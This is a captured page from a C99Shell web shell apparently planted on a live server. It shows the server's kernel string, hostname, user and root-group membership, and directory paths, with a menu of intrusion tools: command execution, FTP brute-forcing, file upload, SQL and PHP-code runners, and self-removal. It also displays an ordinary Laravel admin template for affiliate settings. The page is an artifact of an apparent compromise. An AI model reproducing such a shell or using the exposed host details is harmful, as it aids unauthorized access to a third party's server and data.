!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/admin/affiliate-settings/   drwxr-xr-x
Free 29.29 GB of 117.98 GB (24.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (4.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.layouts.app')

@section('title')
    {{ __('affiliate_settings') }}
@endsection

@section('content')
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-12">
                <div class="card">
                    <div class="card-header">
                        <h3 class="card-title">{{ __('affiliate_settings') }}</h3>
                    </div>
                    <form action="{{route('affiliate-settings.update', $affiliateSettings->id)}}" method="post">
                        @csrf
                        @method('PUT')
                        <div class="card-body">
                            <div class="row">
                                <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="affiliate_feature">{{ __('invite_points') }}</label>
                                        <input value="{{ $affiliateSettings->invite_points ?? 0 }}" name="invite_points" type="text"
                                        class="form-control @error('invite_points') is-invalid @enderror"
                                        placeholder="{{ __('enter_invite_points') }}" >
                                        @error('invite_points')
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $message }}</strong>
                                            </span>
                                        @enderror
                                    </div>

                                    <div class="form-group">
                                        <label for="point_convert_permission">{{ __('point_convert_permission') }}</label>
                                        <select name="point_convert_permission" class="select2bs4 form-control">
                                            <option value="1" @if ($affiliateSettings->point_convert_permission == 1) selected @endif>User Access</option>
                                            <option value="2" @if ($affiliateSettings->point_convert_permission == 2) selected @endif>Admin Approval</option>
                                        </select>
                                        @error('point_convert_permission')
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $message }}</strong>
                                            </span>
                                        @enderror
                                    </div>
                                </div>

                                {{-- <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="affiliate_feature">{{ __('affiliate_feature') }}</label>
                                        <select name="affiliate_feature" class="select2bs4 form-control" disabled>
                                            <option value="1" @if ($affiliateSettings->affiliate_feature == 1) selected @endif>Active</option>
                                            <option value="0" @if ($affiliateSettings->affiliate_feature == 0) selected @endif>Inactive</option>
                                        </select>
                                        @error('affiliate_feature')
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $message }}</strong>
                                            </span>
                                        @enderror
                                    </div>
                                </div> --}}

                            </div>
                        </div>
                        <div class="card-footer">
                            <button type="submit" class="btn btn-primary">{{ __('save') }}</button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--